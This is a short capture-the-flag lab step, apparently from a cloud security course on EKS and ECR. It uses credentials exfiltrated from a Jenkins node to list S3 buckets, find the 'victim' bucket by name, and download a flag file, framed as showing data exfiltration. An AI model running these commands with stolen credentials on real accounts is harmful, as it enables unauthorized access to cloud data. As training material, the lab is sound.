Lab: Privilege Escalation & S3 Exploitation for Flag

Continue using the same terminal on which exfiltrated credentials are configured.

Change directory to jenkins_cve.

cd /workspaces/ecr_eks_security_masterclass_public/eks/jenkins_cve

Use node credentials to list internal s3 bucket and get the flag.

S3 endpoints region agnostic.

aws s3 ls

Get the data from internal bucket, demonstrating attacker was able to exflitrate the data.

export VICTIM_BUCKET=$(aws s3 ls | grep 'peachycloudsecurity-' | awk '{print $3}')

aws s3 ls s3://$VICTIM_BUCKET
aws s3 cp s3://$VICTIM_BUCKET/flag.txt . && cat flag.txt